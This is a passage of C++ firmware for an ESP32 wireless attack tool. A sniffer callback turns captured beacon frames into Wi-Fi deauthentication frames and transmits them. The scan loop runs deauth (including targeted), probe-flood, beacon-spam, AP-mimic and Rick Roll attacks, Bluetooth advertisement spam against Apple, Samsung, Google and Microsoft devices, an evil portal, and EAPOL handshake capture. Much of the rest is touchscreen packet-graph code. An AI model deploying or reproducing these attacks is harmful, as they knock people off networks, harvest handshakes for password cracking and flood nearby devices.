wifi_promiscuous_pkt_t *snifferPacket = (wifi_promiscuous_pkt_t*)buf;
WifiMgmtHdr *frameControl = (WifiMgmtHdr*)snifferPacket->payload;
wifi_pkt_rx_ctrl_t ctrl = (wifi_pkt_rx_ctrl_t)snifferPacket->rx_ctrl;
int len = snifferPacket->rx_ctrl.sig_len;
if (type == WIFI_PKT_MGMT)
{
len -= 4;
int fctl = ntohs(frameControl->fctl);
const wifi_ieee80211_packet_t *ipkt = (wifi_ieee80211_packet_t *)snifferPacket->payload;
const WifiMgmtHdr *hdr = &ipkt->hdr;
}
// Found beacon frame. Decide whether to deauth
if (snifferPacket->payload[0] == 0x80) {
// Do target stuff
if (wifi_scan_obj.currentScanMode == WIFI_SCAN_ACTIVE_LIST_EAPOL) {
bool found = false;
// Check list of APs
for (int i = 0; i < access_points->size(); i++) {
if (access_points->get(i).selected) {
uint8_t addr[] = {snifferPacket->payload[10],
snifferPacket->payload[11],
snifferPacket->payload[12],
snifferPacket->payload[13],
snifferPacket->payload[14],
snifferPacket->payload[15]};
// Compare AP bssid to ssid of recvd packet
for (int x = 0; x < 6; x++) {
if (addr[x] != access_points->get(i).bssid[x]) {
found = false;
break;
}
else
found = true;
}
if (found) {
Serial.println("Received beacon from " + access_points->get(i).essid + ". Deauthenticating...");
break;
}
}
}
if (!found)
return;
} // End targeted stuff
// Build packet
wifi_scan_obj.deauth_frame_default[10] = snifferPacket->payload[10];
wifi_scan_obj.deauth_frame_default[11] = snifferPacket->payload[11];
wifi_scan_obj.deauth_frame_default[12] = snifferPacket->payload[12];
wifi_scan_obj.deauth_frame_default[13] = snifferPacket->payload[13];
wifi_scan_obj.deauth_frame_default[14] = snifferPacket->payload[14];
wifi_scan_obj.deauth_frame_default[15] = snifferPacket->payload[15];
wifi_scan_obj.deauth_frame_default[16] = snifferPacket->payload[10];
wifi_scan_obj.deauth_frame_default[17] = snifferPacket->payload[11];
wifi_scan_obj.deauth_frame_default[18] = snifferPacket->payload[12];
wifi_scan_obj.deauth_frame_default[19] = snifferPacket->payload[13];
wifi_scan_obj.deauth_frame_default[20] = snifferPacket->payload[14];
wifi_scan_obj.deauth_frame_default[21] = snifferPacket->payload[15];
// Send packet
esp_wifi_80211_tx(WIFI_IF_AP, wifi_scan_obj.deauth_frame_default, sizeof(wifi_scan_obj.deauth_frame_default), false);
delay(1);
}
if (( (snifferPacket->payload[30] == 0x88 && snifferPacket->payload[31] == 0x8e)|| ( snifferPacket->payload[32] == 0x88 && snifferPacket->payload[33] == 0x8e) )){
num_eapol++;
Serial.println("Received EAPOL:");
}
buffer_obj.append(snifferPacket, len);
}
#ifdef HAS_SCREEN
void WiFiScan::eapolMonitorMain(uint32_t currentTime)
{
//---------MAIN 'FOR' LOOP! THIS IS WHERE ALL THE ACTION HAPPENS! HAS TO BE FAST!!!!!---------\\
// for (x_pos = (11 + x_scale); x_pos <= 320; x_pos += x_scale) //go along every point on the x axis and do something, start over when finished
for (x_pos = (11 + x_scale); x_pos <= 320; x_pos = x_pos)
{
currentTime = millis();
do_break = false;
y_pos_x = 0;
y_pos_y = 0;
y_pos_z = 0;
boolean pressed = false;
uint16_t t_x = 0, t_y = 0; // To store the touch coordinates
// Do the touch stuff
#ifdef HAS_ILI9341
pressed = display_obj.tft.getTouch(&t_x, &t_y);
#endif
if (pressed) {
Serial.print("Got touch | X: ");
Serial.print(t_x);
Serial.print(" Y: ");
Serial.println(t_y);
}
// Check buttons for presses
for (uint8_t b = 0; b < BUTTON_ARRAY_LEN; b++)
{
if (pressed && display_obj.key[b].contains(t_x, t_y))
{
display_obj.key[b].press(true);
} else {
display_obj.key[b].press(false);
}
}
// Which buttons pressed
for (uint8_t b = 0; b < BUTTON_ARRAY_LEN; b++)
{
if (display_obj.key[b].justPressed())
{
Serial.println("Bro, key pressed");
//do_break = true;
}
if (display_obj.key[b].justReleased())
{
do_break = true;
// Channel - button pressed
if (b == 4) {
if (set_channel > 1) {
Serial.println("Shit channel down");
set_channel--;
delay(70);
display_obj.tft.fillRect(127, 0, 193, 28, TFT_BLACK);
display_obj.tftDrawChannelScaleButtons(set_channel);
display_obj.tftDrawExitScaleButtons();
changeChannel();
break;
}
}
// Channel + button pressed
else if (b == 5) {
if (set_channel < MAX_CHANNEL) {
Serial.println("Shit channel up");
set_channel++;
delay(70);
display_obj.tft.fillRect(127, 0, 193, 28, TFT_BLACK);
display_obj.tftDrawChannelScaleButtons(set_channel);
display_obj.tftDrawExitScaleButtons();
changeChannel();
break;
}
}
else if (b == 6) {
Serial.println("Exiting packet monitor...");
this->StartScan(WIFI_SCAN_OFF);
//display_obj.tft.init();
this->orient_display = true;
return;
}
}
}
if (currentTime - initTime >= (GRAPH_REFRESH * 5)) {
x_pos += x_scale;
initTime = millis();
y_pos_x = ((-num_eapol * (y_scale * 3)) + (HEIGHT_1 - 2)); // GREEN
if (y_pos_x >= HEIGHT_1) {
Serial.println("Max EAPOL number reached. Adjusting...");
num_eapol = 0;
}
//CODE FOR PLOTTING CONTINUOUS LINES!!!!!!!!!!!!
//Plot "X" value
display_obj.tft.drawLine(x_pos - x_scale, y_pos_x_old, x_pos, y_pos_x, TFT_CYAN);
//Draw preceding black 'boxes' to erase old plot lines, !!!WEIRD CODE TO COMPENSATE FOR BUTTONS AND COLOR KEY SO 'ERASER' DOESN'T ERASE BUTTONS AND COLOR KEY!!!
if ((x_pos <= 90) || ((x_pos >= 117) && (x_pos <= 320))) //above x axis
{
display_obj.tft.fillRect(x_pos+1, 28, 10, 93, TFT_BLACK); //compensate for buttons!
}
else
{
display_obj.tft.fillRect(x_pos+1, 0, 10, 121, TFT_BLACK); //don't compensate for buttons!
}
if (x_pos < 0) // below x axis
{
//tft.fillRect(x_pos+1, 121, 10, 88, TFT_BLACK);
display_obj.tft.fillRect(x_pos+1, 121, 10, 88, TFT_CYAN);
}
else
{
//tft.fillRect(x_pos+1, 121, 10, 119, TFT_BLACK);
display_obj.tft.fillRect(x_pos+1, 121, 10, 118, TFT_BLACK);
}
//tftDisplayTime();
if ( (y_pos_x == 120) || (y_pos_y == 120) || (y_pos_z == 120) )
{
display_obj.tft.drawFastHLine(10, 120, 310, TFT_WHITE); // x axis
}
y_pos_x_old = y_pos_x; //set old y pos values to current y pos values
//y_pos_y_old = y_pos_y;
//y_pos_z_old = y_pos_z;
//delay(50);
}
#ifdef HAS_SD
sd_obj.main();
#endif
}
display_obj.tft.fillRect(127, 0, 193, 28, TFT_BLACK); //erase XY buttons and any lines behind them
display_obj.tft.fillRect(12, 0, 90, 32, TFT_BLACK); // key
display_obj.tftDrawChannelScaleButtons(set_channel);
display_obj.tftDrawExitScaleButtons();
display_obj.tftDrawEapolColorKey();
display_obj.tftDrawGraphObjects(x_scale);
}
void WiFiScan::packetMonitorMain(uint32_t currentTime)
{
//---------MAIN 'FOR' LOOP! THIS IS WHERE ALL THE ACTION HAPPENS! HAS TO BE FAST!!!!!---------\\
// for (x_pos = (11 + x_scale); x_pos <= 320; x_pos += x_scale) //go along every point on the x axis and do something, start over when finished
for (x_pos = (11 + x_scale); x_pos <= 320; x_pos = x_pos)
{
currentTime = millis();
do_break = false;
y_pos_x = 0;
y_pos_y = 0;
y_pos_z = 0;
boolean pressed = false;
uint16_t t_x = 0, t_y = 0; // To store the touch coordinates
// Do the touch stuff
#ifdef HAS_ILI9341
pressed = display_obj.tft.getTouch(&t_x, &t_y);
#endif
if (pressed) {
Serial.print("Got touch | X: ");
Serial.print(t_x);
Serial.print(" Y: ");
Serial.println(t_y);
}
// Check buttons for presses
for (uint8_t b = 0; b < BUTTON_ARRAY_LEN; b++)
{
if (pressed && display_obj.key[b].contains(t_x, t_y))
{
display_obj.key[b].press(true);
} else {
display_obj.key[b].press(false);
}
}
// Which buttons pressed
for (uint8_t b = 0; b < BUTTON_ARRAY_LEN; b++)
{
if (display_obj.key[b].justPressed())
{
Serial.println("Bro, key pressed");
//do_break = true;
}
if (display_obj.key[b].justReleased())
{
do_break = true;
// X - button pressed
if (b == 0) {
if (x_scale > 1) {
x_scale--;
delay(70);
display_obj.tft.fillRect(127, 0, 193, 28, TFT_BLACK);
display_obj.tftDrawXScaleButtons(x_scale);
display_obj.tftDrawYScaleButtons(y_scale);
display_obj.tftDrawChannelScaleButtons(set_channel);
display_obj.tftDrawExitScaleButtons();
break;
}
}
// X + button pressed
else if (b == 1) {
if (x_scale < 6) {
x_scale++;
delay(70);
display_obj.tft.fillRect(127, 0, 193, 28, TFT_BLACK);
display_obj.tftDrawXScaleButtons(x_scale);
display_obj.tftDrawYScaleButtons(y_scale);
display_obj.tftDrawChannelScaleButtons(set_channel);
display_obj.tftDrawExitScaleButtons();
break;
}
}
// Y - button pressed
else if (b == 2) {
if (y_scale > 1) {
y_scale--;
delay(70);
display_obj.tft.fillRect(127, 0, 193, 28, TFT_BLACK);
display_obj.tftDrawXScaleButtons(x_scale);
display_obj.tftDrawYScaleButtons(y_scale);
display_obj.tftDrawChannelScaleButtons(set_channel);
display_obj.tftDrawExitScaleButtons();
//updateMidway();
break;
}
}
// Y + button pressed
else if (b == 3) {
if (y_scale < 9) {
y_scale++;
delay(70);
display_obj.tft.fillRect(127, 0, 193, 28, TFT_BLACK);
display_obj.tftDrawXScaleButtons(x_scale);
display_obj.tftDrawYScaleButtons(y_scale);
display_obj.tftDrawChannelScaleButtons(set_channel);
display_obj.tftDrawExitScaleButtons();
//updateMidway();
break;
}
}
// Channel - button pressed
else if (b == 4) {
if (set_channel > 1) {
Serial.println("Shit channel down");
set_channel--;
delay(70);
display_obj.tft.fillRect(127, 0, 193, 28, TFT_BLACK);
display_obj.tftDrawXScaleButtons(x_scale);
display_obj.tftDrawYScaleButtons(y_scale);
display_obj.tftDrawChannelScaleButtons(set_channel);
display_obj.tftDrawExitScaleButtons();
changeChannel();
break;
}
}
// Channel + button pressed
else if (b == 5) {
if (set_channel < MAX_CHANNEL) {
Serial.println("Shit channel up");
set_channel++;
delay(70);
display_obj.tft.fillRect(127, 0, 193, 28, TFT_BLACK);
display_obj.tftDrawXScaleButtons(x_scale);
display_obj.tftDrawYScaleButtons(y_scale);
display_obj.tftDrawChannelScaleButtons(set_channel);
display_obj.tftDrawExitScaleButtons();
changeChannel();
break;
}
}
else if (b == 6) {
Serial.println("Exiting packet monitor...");
this->StartScan(WIFI_SCAN_OFF);
//display_obj.tft.init();
this->orient_display = true;
return;
}
}
}
if (currentTime - initTime >= GRAPH_REFRESH) {
//Serial.println("-----------------------------------------");
//Serial.println("Time elapsed: " + (String)(currentTime - initTime) + "ms");
x_pos += x_scale;
initTime = millis();
y_pos_x = ((-num_beacon * (y_scale * 3)) + (HEIGHT_1 - 2)); // GREEN
y_pos_y = ((-num_deauth * (y_scale * 3)) + (HEIGHT_1 - 2)); // RED
y_pos_z = ((-num_probe * (y_scale * 3)) + (HEIGHT_1 - 2)); // BLUE
//Serial.println("num_beacon: " + (String)num_beacon);
//Serial.println("num_deauth: " + (String)num_deauth);
//Serial.println(" num_probe: " + (String)num_probe);
num_beacon = 0;
num_probe = 0;
num_deauth = 0;
//CODE FOR PLOTTING CONTINUOUS LINES!!!!!!!!!!!!
//Plot "X" value
display_obj.tft.drawLine(x_pos - x_scale, y_pos_x_old, x_pos, y_pos_x, TFT_GREEN);
//Plot "Z" value
display_obj.tft.drawLine(x_pos - x_scale, y_pos_z_old, x_pos, y_pos_z, TFT_BLUE);
//Plot "Y" value
display_obj.tft.drawLine(x_pos - x_scale, y_pos_y_old, x_pos, y_pos_y, TFT_RED);
//Draw preceding black 'boxes' to erase old plot lines, !!!WEIRD CODE TO COMPENSATE FOR BUTTONS AND COLOR KEY SO 'ERASER' DOESN'T ERASE BUTTONS AND COLOR KEY!!!
//if ((x_pos <= 90) || ((x_pos >= 198) && (x_pos <= 320))) //above x axis
if ((x_pos <= 90) || ((x_pos >= 117) && (x_pos <= 320))) //above x axis
{
display_obj.tft.fillRect(x_pos+1, 28, 10, 93, TFT_BLACK); //compensate for buttons!
}
else
{
display_obj.tft.fillRect(x_pos+1, 0, 10, 121, TFT_BLACK); //don't compensate for buttons!
}
//if ((x_pos >= 254) && (x_pos <= 320)) //below x axis
//if (x_pos <= 90)
if (x_pos < 0) // below x axis
{
//tft.fillRect(x_pos+1, 121, 10, 88, TFT_BLACK);
display_obj.tft.fillRect(x_pos+1, 121, 10, 88, TFT_CYAN);
}
else
{
//tft.fillRect(x_pos+1, 121, 10, 119, TFT_BLACK);
display_obj.tft.fillRect(x_pos+1, 121, 10, 118, TFT_BLACK);
}
//tftDisplayTime();
if ( (y_pos_x == 120) || (y_pos_y == 120) || (y_pos_z == 120) )
{
display_obj.tft.drawFastHLine(10, 120, 310, TFT_WHITE); // x axis
}
y_pos_x_old = y_pos_x; //set old y pos values to current y pos values
y_pos_y_old = y_pos_y;
y_pos_z_old = y_pos_z;
//delay(50);
}
#ifdef HAS_SD
sd_obj.main();
#endif
}
display_obj.tft.fillRect(127, 0, 193, 28, TFT_BLACK); //erase XY buttons and any lines behind them
//tft.fillRect(56, 0, 66, 32, TFT_ORANGE); //erase time and color key and any stray lines behind them
display_obj.tft.fillRect(12, 0, 90, 32, TFT_BLACK); // key
display_obj.tftDrawXScaleButtons(x_scale); //redraw stuff
display_obj.tftDrawYScaleButtons(y_scale);
display_obj.tftDrawChannelScaleButtons(set_channel);
display_obj.tftDrawExitScaleButtons();
display_obj.tftDrawColorKey();
display_obj.tftDrawGraphObjects(x_scale);
}
#endif
//void WiFiScan::sniffer_callback(void* buf, wifi_promiscuous_pkt_type_t type) {
// wifi_promiscuous_pkt_t *snifferPacket = (wifi_promiscuous_pkt_t*)buf;
// showMetadata(snifferPacket, type);
//}
void WiFiScan::changeChannel(int chan) {
this->set_channel = chan;
esp_wifi_set_channel(this->set_channel, WIFI_SECOND_CHAN_NONE);
delay(1);
}
void WiFiScan::changeChannel()
{
esp_wifi_set_channel(this->set_channel, WIFI_SECOND_CHAN_NONE);
delay(1);
}
// Function to cycle to the next channel
void WiFiScan::channelHop()
{
this->set_channel = this->set_channel + 1;
if (this->set_channel > 13) {
this->set_channel = 1;
}
esp_wifi_set_channel(this->set_channel, WIFI_SECOND_CHAN_NONE);
delay(1);
}
char* WiFiScan::stringToChar(String string) {
char buf[string.length() + 1] = {};
string.toCharArray(buf, string.length() + 1);
return buf;
}
// Function for updating scan status
void WiFiScan::main(uint32_t currentTime)
{
// WiFi operations
if ((currentScanMode == WIFI_SCAN_PROBE) ||
(currentScanMode == WIFI_SCAN_AP) ||
(currentScanMode == WIFI_SCAN_STATION) ||
(currentScanMode == WIFI_SCAN_SIG_STREN) ||
(currentScanMode == WIFI_SCAN_TARGET_AP) ||
(currentScanMode == WIFI_SCAN_PWN) ||
(currentScanMode == WIFI_SCAN_DEAUTH) ||
(currentScanMode == WIFI_SCAN_STATION_WAR_DRIVE) ||
(currentScanMode == WIFI_SCAN_ALL))
{
if (currentTime - initTime >= this->channel_hop_delay * 1000)
{
initTime = millis();
channelHop();
}
}
else if ((currentScanMode == BT_ATTACK_SWIFTPAIR_SPAM) ||
(currentScanMode == BT_ATTACK_SOUR_APPLE) ||
(currentScanMode == BT_ATTACK_SPAM_ALL) ||
(currentScanMode == BT_ATTACK_SAMSUNG_SPAM) ||
(currentScanMode == BT_ATTACK_GOOGLE_SPAM)) {
#ifdef HAS_BT
if (currentTime - initTime >= 1000) {
initTime = millis();
String displayString = "";
String displayString2 = "";
displayString.concat("Advertising Data...");
for (int x = 0; x < STANDARD_FONT_CHAR_LIMIT; x++)
displayString2.concat(" ");
#ifdef HAS_SCREEN
display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
display_obj.showCenterText(displayString2, TFT_HEIGHT / 2);
display_obj.showCenterText(displayString, TFT_HEIGHT / 2);
#endif
}
if ((currentScanMode == BT_ATTACK_GOOGLE_SPAM) ||
(currentScanMode == BT_ATTACK_SPAM_ALL))
this->executeSwiftpairSpam(Google);
if ((currentScanMode == BT_ATTACK_SAMSUNG_SPAM) ||
(currentScanMode == BT_ATTACK_SPAM_ALL))
this->executeSwiftpairSpam(Samsung);
if ((currentScanMode == BT_ATTACK_SWIFTPAIR_SPAM) ||
(currentScanMode == BT_ATTACK_SPAM_ALL))
this->executeSwiftpairSpam(Microsoft);
if ((currentScanMode == BT_ATTACK_SOUR_APPLE) ||
(currentScanMode == BT_ATTACK_SPAM_ALL))
this->executeSourApple();
#endif
}
else if (currentScanMode == WIFI_SCAN_WAR_DRIVE) {
if (currentTime - initTime >= this->channel_hop_delay * 1000)
{
initTime = millis();
#ifdef HAS_GPS
if (gps_obj.getGpsModuleStatus())
this->executeWarDrive();
#endif
}
}
else if (currentScanMode == WIFI_SCAN_GPS_DATA) {
if (currentTime - initTime >= 5000) {
this->initTime = millis();
this->RunGPSInfo();
}
}
else if (currentScanMode == WIFI_SCAN_GPS_NMEA) {
if (currentTime - initTime >= 1000) {
this->initTime = millis();
this->RunGPSNmea();
}
}
else if (currentScanMode == WIFI_SCAN_EVIL_PORTAL) {
evil_portal_obj.main(currentScanMode);
}
else if (currentScanMode == WIFI_PACKET_MONITOR)
{
#ifdef HAS_SCREEN
#ifdef HAS_ILI9341
packetMonitorMain(currentTime);
#endif
#endif
}
else if (currentScanMode == WIFI_SCAN_EAPOL)
{
#ifdef HAS_SCREEN
#ifdef HAS_ILI9341
eapolMonitorMain(currentTime);
#endif
#endif
}
else if (currentScanMode == WIFI_SCAN_ACTIVE_EAPOL)
{
#ifdef HAS_SCREEN
eapolMonitorMain(currentTime);
#endif
}
else if (currentScanMode == WIFI_SCAN_ACTIVE_LIST_EAPOL) {
if (currentTime - initTime >= this->channel_hop_delay * 1000)
{
initTime = millis();
channelHop();
}
#ifdef HAS_SCREEN
eapolMonitorMain(currentTime);
#endif
}
else if (currentScanMode == WIFI_ATTACK_AUTH) {
for (int i = 0; i < 55; i++)
this->sendProbeAttack(currentTime);
if (currentTime - initTime >= 1000) {
initTime = millis();
String displayString = "";
String displayString2 = "";
displayString.concat(text18);
displayString.concat(packets_sent);
for (int x = 0; x < STANDARD_FONT_CHAR_LIMIT; x++)
displayString2.concat(" ");
#ifdef HAS_SCREEN
display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
display_obj.showCenterText(displayString2, TFT_HEIGHT / 2);
display_obj.showCenterText(displayString, TFT_HEIGHT / 2);
#endif
packets_sent = 0;
}
}
else if (currentScanMode == WIFI_ATTACK_DEAUTH) {
for (int i = 0; i < 55; i++)
this->sendDeauthAttack(currentTime, this->dst_mac);
if (currentTime - initTime >= 1000) {
initTime = millis();
String displayString = "";
String displayString2 = "";
displayString.concat(text18);
displayString.concat(packets_sent);
for (int x = 0; x < STANDARD_FONT_CHAR_LIMIT; x++)
displayString2.concat(" ");
#ifdef HAS_SCREEN
display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
display_obj.showCenterText(displayString2, TFT_HEIGHT / 2);
display_obj.showCenterText(displayString, TFT_HEIGHT / 2);
#endif
packets_sent = 0;
}
}
else if (currentScanMode == WIFI_ATTACK_DEAUTH_MANUAL) {
for (int i = 0; i < 55; i++)
this->sendDeauthFrame(this->src_mac, this->set_channel, this->dst_mac);
if (currentTime - initTime >= 1000) {
initTime = millis();
String displayString = "";
String displayString2 = "";
displayString.concat(text18);
displayString.concat(packets_sent);
for (int x = 0; x < STANDARD_FONT_CHAR_LIMIT; x++)
displayString2.concat(" ");
#ifdef HAS_SCREEN
display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
display_obj.showCenterText(displayString2, TFT_HEIGHT / 2);
display_obj.showCenterText(displayString, TFT_HEIGHT / 2);
#endif
packets_sent = 0;
}
}
else if (currentScanMode == WIFI_ATTACK_DEAUTH_TARGETED) {
// Loop through each AP
for (int x = 0; x < access_points->size(); x++) {
// Only get selected APs
if (access_points->get(x).selected) {
AccessPoint cur_ap = access_points->get(x);
// Loop through each AP's Station
for (int i = 0; i < cur_ap.stations->size(); i++) {
// Only get selected Stations
if (stations->get(cur_ap.stations->get(i)).selected) {
Station cur_sta = stations->get(cur_ap.stations->get(i));
// Send deauths for each selected AP's selected Station
for (int y = 0; y < 25; y++)
this->sendDeauthFrame(cur_ap.bssid, cur_ap.channel, cur_sta.mac);
// Display packets sent on screen
if (currentTime - initTime >= 1000) {
initTime = millis();
String displayString = "";
String displayString2 = "";
displayString.concat(text18);
displayString.concat(packets_sent);
for (int x = 0; x < STANDARD_FONT_CHAR_LIMIT; x++)
displayString2.concat(" ");
#ifdef HAS_SCREEN
display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
display_obj.showCenterText(displayString2, TFT_HEIGHT / 2);
display_obj.showCenterText(displayString, TFT_HEIGHT / 2);
#endif
packets_sent = 0;
}
}
}
}
}
}
else if ((currentScanMode == WIFI_ATTACK_MIMIC)) {
// Need this for loop because getTouch causes ~10ms delay
// which makes beacon spam less effective
for (int i = 0; i < access_points->size(); i++) {
if (access_points->get(i).selected)
this->broadcastCustomBeacon(currentTime, ssid{access_points->get(i).essid, random(1, 12), {random(256),
random(256),
random(256),
random(256),
random(256),
random(256)}});
}
if (currentTime - initTime >= 1000)
{
initTime = millis();
//Serial.print("packets/sec: ");
//Serial.println(packets_sent);
String displayString = "";
String displayString2 = "";
displayString.concat(text18);
displayString.concat(packets_sent);
for (int x = 0; x < STANDARD_FONT_CHAR_LIMIT; x++)
displayString2.concat(" ");
#ifdef HAS_SCREEN
display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
display_obj.showCenterText(displayString2, TFT_HEIGHT / 2);
display_obj.showCenterText(displayString, TFT_HEIGHT / 2);
#endif
packets_sent = 0;
}
}
else if ((currentScanMode == WIFI_ATTACK_BEACON_SPAM))
{
// Need this for loop because getTouch causes ~10ms delay
// which makes beacon spam less effective
for (int i = 0; i < 55; i++)
broadcastRandomSSID(currentTime);
if (currentTime - initTime >= 1000)
{
initTime = millis();
//Serial.print("packets/sec: ");
//Serial.println(packets_sent);
String displayString = "";
String displayString2 = "";
displayString.concat(text18);
displayString.concat(packets_sent);
for (int x = 0; x < STANDARD_FONT_CHAR_LIMIT; x++)
displayString2.concat(" ");
#ifdef HAS_SCREEN
display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
display_obj.showCenterText(displayString2, TFT_HEIGHT / 2);
display_obj.showCenterText(displayString, TFT_HEIGHT / 2);
#endif
packets_sent = 0;
}
}
else if ((currentScanMode == WIFI_ATTACK_BEACON_LIST)) {
for (int i = 0; i < ssids->size(); i++)
this->broadcastCustomBeacon(currentTime, ssids->get(i));
if (currentTime - initTime >= 1000)
{
initTime = millis();
String displayString = "";
String displayString2 = "";
displayString.concat(text18);
displayString.concat(packets_sent);
for (int x = 0; x < STANDARD_FONT_CHAR_LIMIT; x++)
displayString2.concat(" ");
#ifdef HAS_SCREEN
display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
display_obj.showCenterText(displayString2, TFT_HEIGHT / 2);
display_obj.showCenterText(displayString, TFT_HEIGHT / 2);
#endif
packets_sent = 0;
}
}
else if ((currentScanMode == WIFI_ATTACK_AP_SPAM)) {
for (int i = 0; i < access_points->size(); i++) {
if (access_points->get(i).selected)
this->broadcastCustomBeacon(currentTime, access_points->get(i));
}
if (currentTime - initTime >= 1000) {
initTime = millis();
packets_sent = 0;
}
}
else if ((currentScanMode == WIFI_ATTACK_RICK_ROLL))
{
// Need this for loop because getTouch causes ~10ms delay
// which makes beacon spam less effective
for (int i = 0; i < 7; i++)
{
for (int x = 0; x < (sizeof(rick_roll)/sizeof(char *)); x++)
{
broadcastSetSSID(currentTime, rick_roll[x]);
}
}
if (currentTime - initTime >= 1000)
{
initTime = millis();
//Serial.print("packets/sec: ");
//Serial.println(packets_sent);
String displayString = "";
String displayString2 = "";
displayString.concat(text18);
displayString.concat(packets_sent);
for (int x = 0; x < STANDARD_FONT_CHAR_LIMIT; x++)
displayString2.concat(" ");
#ifdef HAS_SCREEN
display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
display_obj.showCenterText(displayString2, TFT_HEIGHT / 2);
display_obj.showCenterText(displayString, TFT_HEIGHT / 2);
#endif
packets_sent = 0;
}
}
#ifdef HAS_GPS
else if ((currentScanMode == WIFI_SCAN_OFF))
if(gps_obj.queue_enabled())
gps_obj.disable_queue();
#endif
}
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